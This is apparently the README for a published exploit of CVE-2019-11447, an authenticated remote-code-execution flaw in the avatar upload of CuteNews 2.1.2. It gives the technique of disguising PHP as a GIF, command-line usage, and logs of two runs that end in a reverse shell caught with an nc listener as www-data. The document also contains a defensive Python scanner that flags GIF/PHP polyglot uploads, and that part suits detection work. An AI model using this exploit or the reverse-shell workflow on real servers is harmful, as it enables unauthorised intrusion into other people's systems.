/CVE-2019-11447_CuteNews-AvatarUploadRCE

CVE-2019-11447 Exploit/PoC - CuteNews 2.1.2 Avatar upload RCE (Authenticated)

Exploit Code for CVE-2019-11447 aka CuteNews 2.1.2 Avatar upload RCE (Authenticated)

Exploit Links:

Expected outcome: log in to or register an account, prepend .gif magic bytes to a user-selected PHP file, upload it as an avatar, and then request it to achieve remote code execution.

Intended only for educational use and for testing in corporate environments.

This exploit was tested on Python 3.8.6.
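As an added defensive check, not part of this exploit or of CuteNews, the script below scans an avatar upload directory for the artefact the technique above leaves behind: a file that starts with a GIF header but contains PHP tags, or that carries a script extension at all. The directory, file names and sample contents are constructed for the demonstration.

```python
import os
import re
import tempfile

# Real GIF file headers; a GIF/PHP polyglot starts with one of these.
GIF_MAGIC = (b"GIF87a", b"GIF89a")
# Matches "<?php" and the short "<?=" open tag anywhere in the body.
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)
# Extensions a web server may hand to the PHP interpreter.
SCRIPT_EXT = {".php", ".phtml", ".php3", ".php4", ".php5", ".phar"}


def classify_upload(path):
    """Return the list of findings for one file in the upload directory."""
    findings = []
    ext = os.path.splitext(path)[1].lower()
    with open(path, "rb") as fh:
        body = fh.read()
    if ext in SCRIPT_EXT:
        findings.append("script-extension")
    looks_gif = body.startswith(GIF_MAGIC)
    if PHP_TAG.search(body):
        # A GIF header followed by PHP code is the polyglot this CVE relies on.
        findings.append("gif-php-polyglot" if looks_gif else "php-in-upload")
    return findings


def scan_uploads(upload_dir):
    """Walk upload_dir and map every flagged file (relative path) to its findings."""
    results = {}
    for root, _dirs, files in os.walk(upload_dir):
        for name in files:
            path = os.path.join(root, name)
            findings = classify_upload(path)
            if findings:
                results[os.path.relpath(path, upload_dir)] = findings
    return results


def build_sample_dir():
    """Create constructed samples: a benign avatar and a GIF-prefixed PHP file."""
    d = tempfile.mkdtemp(prefix="cutenews-uploads-")
    with open(os.path.join(d, "avatar_ok.gif"), "wb") as fh:
        fh.write(b"GIF89a" + b"\x00" * 32)
    with open(os.path.join(d, "avatar_cold_cold.php"), "wb") as fh:
        fh.write(b"GIF89a\n<?php /* constructed marker */ ?>")
    return d


if __name__ == "__main__":
    for rel, findings in scan_uploads(build_sample_dir()).items():
        print(f"{rel}: {', '.join(findings)}")
```

Run it against a real uploads directory by calling scan_uploads with that path; anything flagged "gif-php-polyglot" or "script-extension" should not be served by the web server.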

Usage

cfx:  ~/cutenews
→ ./exploit.py -h
usage: exploit.py [-h] [-l URL] [-u USERNAME] [-p PASSWORD] [-e EMAIL]

CuteNews 2.1.2 Avatar upload RCE (Authenticated) by ColdFusionX

optional arguments:
  -h, --help            show this help message and exit
  -l URL, --url URL     CuteNews URL (Example: http://127.0.0.1)
  -u USERNAME, --username USERNAME
                        Username to Login/Register
  -p PASSWORD, --password PASSWORD
                        Password to Login/Register
  -e EMAIL, --email EMAIL
                        Email to Login/Register

Exploit usage:
./exploit.py -l http://127.0.0.1 -u cold -p fusion -e cold@decepticon.net
./exploit.py -l http://127.0.0.1 -u optimus -p prime -e optimus@autobots.net
[^] Select your PHP file -> rev.php
OR
[^] Select your PHP file -> ~/Downloads/rev.php
[^] Press y/n to trigger reverse shell -> y

User inputs:

This exploit expects four arguments to run initially:

  • -l : CuteNews URL
  • -u : Username required to Login/Register
  • -p : Password required to Login/Register
  • -e : Email required to Login/Register

Additional required user inputs:

  • Select your PHP file -> Here the user has to specify the PHP file to be uploaded; it can be any PHP file, for example a PHP info page or a PHP reverse shell. If the PHP file is located in the same directory as the exploit, the user can just specify the file name:

Example: [^] Select your PHP file -> rev.php

Otherwise, the user needs to specify the path to the PHP file:

Example: [^] Select your PHP file -> ~/Downloads/rev.php

  • Press y/n to trigger reverse shell -> Here, if the user has uploaded a PHP reverse shell, they can choose whether to trigger it by answering y or n.

Either way, the exploit prints the uploaded file's location for further use.

Exploit Execution

  • Scenario 1 > Logging in with existing credentials and getting a reverse shell:
cfx:  ~/cutenews
→ ./exploit.py -l http://127.0.0.1 -u optimus -p prime -e optimus@autobots.net
[+] CuteNews 2.1.2 Avatar Upload RCE exploit by ColdFusionX

[+] User exists ! Logged in Successfully
[^] Select your PHP file -> rev.php

[*] Adding Magic Byte to PHP file
[+] Upload Successful !!
[*] File location --> http://10.10.10.206/CuteNews/uploads/avatar_cold_cold.php

[^] Press y/n to trigger PHP file -> y
[*] Check listener for reverse shell
[*] Execution Completed

Shell

cfx:  ~/cutenews
→ nc -lvnp 8020
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::8020
Ncat: Listening on 0.0.0.0:8020
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:32868.
Linux passage 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 03:06:04 up  4:15,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
prime    tty7     :0               22:50    4:15m  9.36s  0.69s /sbin/upstart --user
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ exit
  • Scenario 2 > Registering a new user and getting a reverse shell:
cfx:  ~/cutenews
→ ./exploit.py -l http://127.0.0.1 -u cold -p fusion -e cold@decepticons.net
[+] CuteNews 2.1.2 Avatar Upload RCE exploit by ColdFusionX

[+] Credentials cold:fusion Successfully Registered
[^] Select your PHP file -> rev.php

[*] Adding Magic Byte to PHP file
[+] Upload Successful !!
[*] File location --> http://127.0.0.1/CuteNews/uploads/avatar_cold_cold.php

[^] Press y/n to trigger PHP file -> y
[*] Check listener for reverse shell
[*] Execution Completed

Shell

cfx:  ~/cutenews
→ nc -lvnp 8020
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::8020
Ncat: Listening on 0.0.0.0:8020
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:32868.
Linux passage 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 03:06:04 up  4:15,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
prime   tty7     :0               22:50    4:15m  9.36s  0.69s /sbin/upstart --user
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ exit

Reference